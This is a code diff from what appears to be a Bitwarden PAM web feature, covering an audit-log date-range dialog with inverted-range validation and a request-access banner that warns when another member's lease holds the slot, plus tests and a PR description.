+    initialValue: this.params.to,
+  });
+
+  /** From after To. Surfaced to the auditor, who otherwise reads an empty table as a trail with no events. */
+  protected readonly invertedRange = computed(() => {
+    const start = auditRangeStart(this.fromValue());
+    const end = auditRangeEnd(this.toValue());
+    return start != null && end != null && end.getTime() < start.getTime();
+  });
+
+  /**
+   * The inverted range as the To control's own error, so the field carries the danger border,
+   * `aria-invalid` and the message that `bit-form-field` already renders for a control in error.
+   */
+  private readonly invertedRangeValidator: ValidatorFn = () =>
+    this.invertedRange()
+      ? { invalidDateRange: { message: this.i18nService.t("invalidDateRange") } }
+      : null;
+
+  protected readonly confirmDisabled = computed(() => this.invertedRange());
+
+  constructor() {
+    this.formGroup.controls.to.addValidators(this.invertedRangeValidator);
+
+    // Editing From leaves To's value alone, so nothing else would re-run a cross-field rule. The control
+    // is marked touched on every inverted edit rather than only when the range flips, because
+    // `BitInputDirective.onInput` marks it untouched on each keystroke and
+    // `BitFormFieldControlDirective.hasError` paints nothing on an untouched control — the message would
+    // otherwise blink out mid-edit and stay hidden until the next blur.
+    effect(() => {
+      this.fromValue();
+      this.toValue();
+      this.formGroup.controls.to.updateValueAndValidity();
+      if (this.invertedRange()) {
+        this.formGroup.controls.to.markAsTouched();
+      }
+    });
+  }
+
+  protected readonly confirm = async (): Promise<void> => {
+    if (this.invertedRange()) {
+      return;
+    }
+    const { from, to } = this.formGroup.getRawValue();
+    void this.dialogRef.close({ from: from.trim(), to: to.trim() });
+  };
+
+  static open(
+    dialogService: DialogService,
+    config: DialogConfig<CustomRangeDialogParams>,
+  ): DialogRef<CustomRangeDialogResult | undefined> {
+    return dialogService.open<CustomRangeDialogResult | undefined, CustomRangeDialogParams>(
+      CustomRangeDialogComponent,
+      config,
+    );
+  }
+}

--- a/bitwarden_license/bit-web/src/app/pam/cipher-view-banner/cipher-view-banner.component.html
+++ b/bitwarden_license/bit-web/src/app/pam/cipher-view-banner/cipher-view-banner.component.html
@@ -175,13 +175,31 @@
         @if (loadingRequestForm()) {
           <p bitTypography="body2" class="tw-m-0">{{ "loading" | i18n }}</p>
         } @else if (requestMode() !== null) {
-          <p bitTypography="body2" class="tw-mb-4 tw-mt-0">
-            @if (requestMode() === "automatic") {
-              {{ "requestAccessModalAutomaticDescription" | i18n }}
-            } @else {
-              {{ "requestAccessModalHumanDescription" | i18n }}
-            }
-          </p>
+          @if (slotContention(); as contention) {
+            <!--
+              Replaces the description rather than stacking on top of it: the automatic path's
+              "you'll get immediate access" is false while the slot is taken, so showing both would
+              contradict itself. The form below stays enabled — the request is still worth making.
+            -->
+            <p bitTypography="body2" class="tw-mb-4 tw-mt-0 tw-flex tw-items-start tw-gap-2">
+              <bit-icon name="bwi-exclamation-triangle" class="tw-mt-0.5 tw-text-warning" />
+              <span>
+                @if (contention.freesAt) {
+                  {{ "pamRequestSlotTakenUntil" | i18n: (contention.freesAt | date: "short") }}
+                } @else {
+                  {{ "pamRequestSlotTaken" | i18n }}
+                }
+              </span>
+            </p>
+          } @else {
+            <p bitTypography="body2" class="tw-mb-4 tw-mt-0">
+              @if (requestMode() === "automatic") {
+                {{ "requestAccessModalAutomaticDescription" | i18n }}
+              } @else {
+                {{ "requestAccessModalHumanDescription" | i18n }}
+              }
+            </p>
+          }
 
           @if (requestMode() === "automatic") {
             <form [formGroup]="automaticForm" class="tw-flex tw-flex-col tw-gap-4">

--- a/bitwarden_license/bit-web/src/app/pam/cipher-view-banner/cipher-view-banner.component.spec.ts
+++ b/bitwarden_license/bit-web/src/app/pam/cipher-view-banner/cipher-view-banner.component.spec.ts
@@ -113,6 +113,8 @@ function preCheck(overrides: Partial<AccessPreCheckView> = {}): AccessPreCheckVi
     // empty and every submit path invalid.
     defaultDurationSeconds: 3600,
     maxDurationSeconds: 86_400,
+    // The SDK reads an absent canStartLease as true, so the resting fixture is the startable case.
+    canStartLease: true,
     ...overrides,
   } as unknown as AccessPreCheckView;
 }
@@ -934,6 +936,96 @@ describe("CipherViewBannerComponent", () => {
 
       expect(component["requestError"]()).toBe("requestAccessModalGenericError");
       expect(component["requestMode"]()).toBeNull();
+    });
+
+    describe("when another member holds the single-active-lease slot", () => {
+      it("warns with the time the slot frees, in place of the immediate-access copy", async () => {
+        requestsApi.preCheck.mockResolvedValue(
+          preCheck({ canStartLease: false, slotFreesAt: "2026-08-31T10:52:00Z" }),
+        );
+        await create(gatedCipher());
+
+        await component["toggleRequestForm"]();
+        fixture.detectChanges();
+
+        const text = fixture.nativeElement.textContent as string;
+        expect(text).toContain("pamRequestSlotTakenUntil");
+        // The "you'll get immediate access" line is a lie while the slot is taken, so it must be
+        // replaced rather than stacked on top of.
+        expect(text).not.toContain("requestAccessModalAutomaticDescription");
+      });
+
+      it("warns without a time when the server does not say when it frees", async () => {
+        requestsApi.preCheck.mockResolvedValue(
+          preCheck({ canStartLease: false, slotFreesAt: undefined }),
+        );
+        await create(gatedCipher());
+
+        await component["toggleRequestForm"]();
+        fixture.detectChanges();
+
+        const text = fixture.nativeElement.textContent as string;
+        expect(text).toContain("pamRequestSlotTaken");
+        expect(text).not.toContain("pamRequestSlotTakenUntil");
+      });
+
+      it("leaves the form submittable, because contention is a manual retry", async () => {
+        requestsApi.preCheck.mockResolvedValue(
+          preCheck({ canStartLease: false, slotFreesAt: "2026-08-31T10:52:00Z" }),
+        );
+        await create(gatedCipher());
+
+        await component["toggleRequestForm"]();
+        fixture.detectChanges();
+
+        // An approved request is still worth holding: it can be started the moment the slot frees.
+        expect(query("#pam-cipher-view-banner_select_duration")).not.toBeNull();
+        const submit = query("#pam-cipher-view-banner_button_request-submit");
+        expect(submit).not.toBeNull();
+        expect(submit?.hasAttribute("disabled")).toBe(false);
+      });
+
+      it("stays quiet on the human path, whose window is not now", async () => {
+        // canStartLease answers about NOW. A requester picking Thursday learns nothing from "taken
+        // until 10:52 today", and the spec scopes the warning to an otherwise-auto_approve request.
+        requestsApi.preCheck.mockResolvedValue(
+          preCheck({
+            approvalMode: "human",
+            canStartLease: false,
+            slotFreesAt: "2026-08-31T10:52:00Z",
+          }),
+        );
+        await create(gatedCipher());
+
+        await component["toggleRequestForm"]();
+        fixture.detectChanges();
+
+        expect(component["slotContention"]()).toBeNull();
+        const text = fixture.nativeElement.textContent as string;
+        expect(text).not.toContain("pamRequestSlotTaken");
+        expect(text).toContain("requestAccessModalHumanDescription");
+      });
+
+      it("clears the warning when the form is reopened against a freed slot", async () => {
+        requestsApi.preCheck.mockResolvedValue(
+          preCheck({ canStartLease: false, slotFreesAt: "2026-08-31T10:52:00Z" }),
+        );
+        await create(gatedCipher());
+
+        await component["toggleRequestForm"]();
+        expect(component["slotContention"]()).not.toBeNull();
+
+        // Collapse, then reopen once the holder is done.
+        await component["toggleRequestForm"]();
+        requestsApi.preCheck.mockResolvedValue(preCheck({ canStartLease: true }));
+        await component["toggleRequestForm"]();
+        fixture.detectChanges();
+
+        expect(component["slotContention"]()).toBeNull();
+        expect(fixture.nativeElement.textContent).toContain(
+          "requestAccessModalAutomaticDescription",
+        );
+      });
     });
   });
 

--- a/bitwarden_license/bit-web/src/app/pam/cipher-view-banner/cipher-view-banner.component.ts
+++ b/bitwarden_license/bit-web/src/app/pam/cipher-view-banner/cipher-view-banner.component.ts
@@ -344,6 +344,21 @@ export class CipherViewBannerComponent implements OnInit {
    */
   protected readonly minRequestDate = signal("");
 
+  /**
+   * When another member holds this cipher's single-active-lease slot: `freesAt` is when it ends, or
+   * `null` if the server did not say. `null` overall means the slot is free — or that we have not
+   * asked yet, or that the server predates the field, both of which read as free on purpose.
+   *
+   * Only ever set for a member the singleton actually binds; someone with an ungated or
+   * non-singleton path to the cipher is unconstrained and the server reports them startable.
+   *
+   * One signal rather than two so the pair cannot drift: "taken" and "when it frees" are only ever
+   * learnt together. The retry time is a nicety — the warning still stands without it, and either
+   * way the form stays submittable, because contention is a manual retry and holding an approved
+   * request is still worth doing.
+   */
+  protected readonly slotContention = signal<{ freesAt: string | null } | null>(null);
+
   protected readonly automaticForm = this.formBuilder.nonNullable.group({
     durationSeconds: [DEFAULT_REQUEST_ACCESS_DURATION_SECONDS, Validators.required],
     reason: [""],
@@ -434,6 +449,7 @@ export class CipherViewBannerComponent implements OnInit {
     this.requestError.set(null);
     this.requestMode.set(null);
     this.requestBounds.set(null);
+    this.slotContention.set(null);
     this.automaticForm.reset({
       durationSeconds: DEFAULT_REQUEST_ACCESS_DURATION_SECONDS,
       reason: "",
@@ -466,10 +482,18 @@ export class CipherViewBannerComponent implements OnInit {
         const { date, start, end } = defaultRequestWindow(openedAt, bounds.defaultSeconds);
         this.minRequestDate.set(toDateInputValue(openedAt));
         this.humanForm.patchValue({ date: date ?? "", start: start ?? "", end: end ?? "" });
+        // No contention warning on this path, per the spec's "an otherwise-auto_approve request":
+        // `canStartLease` answers about now, and the window being picked here is in the future, so a
+        // slot taken right now says nothing about it.
       } else {
         // Pre-select the rule's own default rather than a hardcoded hour. `requestDurationOptions`
         // guarantees it is one of the offered options, so the select cannot render blank.
         this.automaticForm.patchValue({ durationSeconds: bounds.defaultSeconds });
+
+        // The SDK owns the fail-open default (absent reads as true), so this is a plain boolean.
+        if (!preCheck.canStartLease) {
+          this.slotContention.set({ freesAt: preCheck.slotFreesAt ?? null });
+        }
       }
       this.requestMode.set(preCheck.approvalMode);
     } catch (e) {

--- a/bitwarden_license/bit-web/src/app/pam/pam.allium
+++ b/bitwarden_license/bit-web/src/app/pam/pam.allium
@@ -35,8 +35,9 @@
 --   - Governance dashboard (GovernanceDashboard) — no server or SDK backing
 --   - EmailApprovalDeepLink as a distinct landing page; /pam/requests/:id currently
 --     serves the requester's own request only
---   - ForecastDecision and RuleAllowsLease as separate reads; the built request form
---     shapes itself from AccessRequestsClient::pre_check instead
+--   - ForecastDecision as a separate read; the built request form shapes itself from
+--     AccessRequestsClient::pre_check instead. RuleAllowsLease now lands through that
+--     same pre_check (PM-42446), as can_start_lease / slot_frees_at.
 
 -- ----------------------------------------------------------------------------
 -- External entities (other systems own these; PAM only references them)
@@ -1409,6 +1410,13 @@ surface RequestAccessModal {
         -- (union/OR); otherwise always startable. Lets the modal warn that an
         -- otherwise-auto_approve request could not be started yet because another lease
         -- is active on this cipher. A current-state hint, re-checked for real at start.
+        --
+        -- Surfaced with the time the slot frees (the blocking lease's not_after, latest
+        -- one wins), so the requester gets a retry time rather than polling. Deliberately
+        -- WITHOUT the holder's identity: same-collection members can already enumerate
+        -- each other, but who is using which privileged credential right now is
+        -- behavioural data only approvers see (ActiveLeasesPage). Revisit only behind an
+        -- org opt-in.
         RuleAllowsLease(requester, target_cipher)
 
     provides:


### PR DESCRIPTION
## 🎟️ Tracking

No Jira ticket. PAM audit log milestone chain.

## 📔 Objective

Adds the client side filter predicate the rest of the audit log stack builds on, and puts an actor, a requester and a date range in front of it.

- `auditRowMatchesFilter` in `access-audit-row.ts` is one predicate over the already fetched window. The endpoint takes no query parameters, so no filter re-reads the trail.
- Actor and requester chips key on ids rather than display names, so two members who share a name stay apart.
- The date range is two `datetime-local` fields. An inverted range is surfaced rather than silently returning nothing.
- Actor and requester arrive here as `bit-chip-filter`. They move to `bit-filter-menu` alongside the Event chip in `pam/audit-time-period-chip`, further up the stack.

Bottom of a six PR stack on `pam/uat`. Nothing sits under it.
